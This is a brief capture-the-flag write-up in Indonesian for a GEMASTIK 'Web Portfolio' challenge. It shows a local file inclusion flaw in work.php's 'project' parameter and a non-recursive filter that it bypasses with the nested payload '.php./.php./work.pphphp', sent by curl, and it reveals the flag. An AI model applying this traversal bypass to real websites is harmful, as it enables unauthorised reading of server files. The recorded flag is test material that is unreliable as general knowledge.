Web Portfolio - 100 Points
http://target.netsec.gemastik.ui.ac.id:60013/f48d89678975d340fe860d08b3c03d1d/
POC
kami mengidentifikasi adalanya LFI pada parameter project
http://target.netsec.gemastik.ui.ac.id:60013/f48d89678975d340fe860d08b3c03d1d/work.php?project=<path>
namun ada filter yang di terapkan sehingga kita tidak bisa dengan mudah untuk melakukan directory traversal
.. => ""
php => ""
titik2 di replace menjadi empty string dan php juga, kita bisa menggunakan kombinasi kedua itu untuk melakukan abuse terhadap scriptnya dan menghasilkan ../../work.php
.php./.php./work.pphphp => "../../work.php"
kita memisahkan titik dua dengan php dan memisahkan php dengan php sehingga terbentuklah path yang ingin kita tuju
curl http://target.netsec.gemastik.ui.ac.id:60013/f48d89678975d340fe860d08b3c03d1d/work.php?project=.php./.php./work.pphphp
Flag: GEMASTIK{i_dunno_why_simple_lfd_is_pretty_common}